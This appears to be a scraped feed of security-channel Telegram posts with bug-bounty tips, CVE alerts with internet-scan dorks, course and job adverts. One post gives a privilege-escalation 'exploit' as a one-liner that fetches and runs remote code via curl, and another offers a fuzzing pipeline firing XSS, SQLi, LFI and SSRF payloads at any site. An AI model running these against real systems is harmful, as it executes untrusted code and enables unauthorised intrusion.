π Ultimate Secret Scanner Regex Collection π
30+ regex patterns to detect leaked credentials:
β API keys (Google, AWS, Stripe)
β Auth tokens (OAuth, JWT)
β Private keys (RSA, PGP)
β Emails, URLs, UUIDs
https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main
#bugbounty #bugbountytip
30+ regex patterns to detect leaked credentials:
β API keys (Google, AWS, Stripe)
β Auth tokens (OAuth, JWT)
β Private keys (RSA, PGP)
β Emails, URLs, UUIDs
https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main
#bugbounty #bugbountytip
π14πΏ12β€2
Please open Telegram to view this post
VIEW IN TELEGRAM
Brilliant Directories
Security Bounty
Learn about Security Bounty - CLICK TO VIEW MORE Β»
π14β€5π€£1
This media is not supported in your browser
VIEW IN TELEGRAM
Google Dorks that can be used for penetration testing, security research, and information gathering.
https://github.com/yogsec/Pen-Testing-Google-Dorks
β€11π₯5π3
π₯ Web Pentesting & Bug Bounty Batch β Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
β€9π3π₯3
On this special occasion, we extend our warmest wishes to all who celebrate Eid. May this day bring you joy, peace, and prosperity.
At Brut Security, we value diversity and unity, and we appreciate each and every member of our community. Whether youβre celebrating or simply sharing in the happiness of others, we hope today is filled with kindness and togetherness.
Stay curious, stay secure, and keep learning!
Please open Telegram to view this post
VIEW IN TELEGRAM
β€57π5π³2π€£2
CVE-2025-2294: Path Traversal in Kubio WordPress plugin, 9.8 rating π₯
A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.
Search at Netlas.io:
π Link: https://nt.ls/iOqr6
π Dork: http.body:"plugins/kubio"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.
Search at Netlas.io:
π Link: https://nt.ls/iOqr6
π Dork: http.body:"plugins/kubio"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
π6π₯3
π₯CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
β. <(curl -SsfL https://thc.org/7350pipe)β
π€£29πΏ14π2β€1
π₯ Discover Web Vulns Like a Pro! π₯
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Hereβs a killer one-liner Iβve been using:
Whatβs it do?
1οΈβ£ Grabs URLs: gau digs up every URL for target.com from the webβs archives.
2οΈβ£ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3οΈβ£ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4οΈβ£ Fuzzes Hard: ffuf blasts payloads from my custom listsβXSS popups, file leaks, you name it!
5οΈβ£ Saves the Loot: Results land in param_vulns.txt for you to exploit.
π‘ Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Hereβs a killer one-liner Iβve been using:
gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt
Whatβs it do?
1οΈβ£ Grabs URLs: gau digs up every URL for target.com from the webβs archives.
2οΈβ£ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3οΈβ£ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4οΈβ£ Fuzzes Hard: ffuf blasts payloads from my custom listsβXSS popups, file leaks, you name it!
5οΈβ£ Saves the Loot: Results land in param_vulns.txt for you to exploit.
π‘ Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
π19β€8πΏ8
CVE-2025-3083, -3084, -3085: Vulnerabilities in MongoDB, 6.5 - 8.1 ratingβοΈ
Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.
Search at Netlas.io:
π Link: https://nt.ls/aqCrV
π Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]
Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.
Search at Netlas.io:
π Link: https://nt.ls/aqCrV
π Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]
Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
π3
Freelance Security Analyst for CTF Challenge
Job Type: Freelance | Remote | Short-term
We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
β Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
β CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
β Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
β Ethical hacking & exploit development (OSCP, CEH preferred)
π© Send your resume to [email protected] or WhatsApp +91-8016167754.
Letβs solve this challenge together!
Job Type: Freelance | Remote | Short-term
We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
β Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
β CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
β Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
β Ethical hacking & exploit development (OSCP, CEH preferred)
π© Send your resume to [email protected] or WhatsApp +91-8016167754.
Letβs solve this challenge together!
π15β€6
Brut Security pinned Β«Freelance Security Analyst for CTF Challenge Job Type: Freelance | Remote | Short-term We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in: β Web Exploitation, Reverse Engineering, Cryptography, Forensicsβ¦Β»
Use TLSx to detect certificate misconfigurations π
Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificatesπ
Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificates
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯46π2
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
π28π₯7β€3π€2
CVE-2025-22457: RCE in Ivanti Connect Secure, 9.0 rating π₯
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
π Link: https://nt.ls/zsWig
π Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
π Link: https://nt.ls/zsWig
π Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
β€5π3